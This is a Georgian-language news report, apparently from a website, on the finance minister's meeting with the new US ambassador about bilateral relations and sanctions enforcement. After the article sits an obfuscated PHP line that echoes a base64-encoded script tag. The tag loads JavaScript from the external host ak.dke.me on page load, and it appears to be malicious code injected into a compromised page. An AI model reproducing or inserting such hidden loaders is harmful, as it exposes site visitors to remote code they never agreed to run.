celsiusi
ავერსი საქკაბელი

საქართველოს ფინანსთა მინისტრი ლაშა ხუციშვილი საქართველოში ამერიკის შეერთებული შტატების ახლად დანიშნულ საგანგებო და სრულუფლებიან ელჩს, რობინ დანიგანს შეხვდა. შეხვედრას დაესწრო ფინანსთა მინისტრის მოადგილე ეკატერინე გუნცაძე.

მხარეებმა განიხილეს საქართველოსა და ამერიკის შეერთებულ შტატებს შორის ორმხრივი ურთიერთობების საკითხები.

ფინანსთა მინისტრმა რობინ დანიგანს საქართველოში დიპლომატიური მისიის დაწყება მიულოცა და წარმატებები უსურვა. საუბარი შეეხო ფინანსთა სამინისტროს ფისკალური სამსახურების შესაძლებლობების გაძლიერების მიმართულებით ამერიკის შეერთებული შტატების მიერ გაწეულ მხარდაჭერას.

მინისტრმა ელჩს ასევე გააცნო საერთაშორისო სანქციების აღსრულების მიზნით საქართველოს ფინანსთა სამინისტროსა და შემოსავლების სამსახურის მიერ გადადგმული ნაბიჯები, არსებული პროცესები და ამ მიმართულებით პარტნიორებთან კოორდინაციის მექანიზმები.

ელჩის მხრიდან დადებითად შეფასდა საქართველოს მიერ საერთაშორისო სანქციების აღსრულების მიზნით შემუშავებული მექანიზმები და არსებული თანამშრომლობა.

შეხვედრის დასასრულს მხარეები მჭიდრო თანამშრომლობის გაგრძელებაზე შეთანხმდნენ.

ინფორმაციას საქართველოს ფინანსთა სამინისტრო ავრცელებს.

340
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");